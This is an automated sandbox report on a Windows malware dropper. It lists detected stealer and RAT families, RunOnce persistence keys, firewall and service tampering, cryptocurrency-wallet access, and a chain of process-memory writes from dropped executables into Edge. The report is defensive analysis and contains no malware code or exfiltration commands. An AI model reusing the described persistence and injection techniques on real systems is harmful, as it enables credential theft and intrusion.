Malware Analysis Report

2024-12-08 00:56

Sample ID 231111-nrp9qafe37
Target 71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371
SHA256 71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371
Tags
glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371

Threat Level: Known bad

The file 71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371 was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan

ZGRat

Glupteba payload

Glupteba

Detect Mystic stealer payload

Detect ZGRat V1

RedLine

SmokeLoader

RedLine payload

SectopRAT

SectopRAT payload

Mystic

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 11:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 11:38

Reported

2023-11-11 11:40

Platform

win10v2004-20231023-en

Max time kernel

97s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DA7F.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B169.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B169.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\Conhost.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\Conhost.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B283.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DD10.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DF91.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe
PID 2156 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe
PID 2156 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe
PID 1408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe
PID 1408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe
PID 1408 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe
PID 1352 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe
PID 1352 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe
PID 1352 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe
PID 4992 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe
PID 4992 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe
PID 4992 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe
PID 3868 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2888 wrote to memory of 4972 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2888 wrote to memory of 4972 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 2360 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 2360 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3672 wrote to memory of 4492 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3672 wrote to memory of 4492 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2304 wrote to memory of 4604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2304 wrote to memory of 4604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2576 wrote to memory of 2904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2576 wrote to memory of 2904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3336 wrote to memory of 2000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3336 wrote to memory of 2000 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3940 wrote to memory of 4220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3940 wrote to memory of 4220 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4472 wrote to memory of 2264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4472 wrote to memory of 2264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2556 wrote to memory of 464 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2556 wrote to memory of 464 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
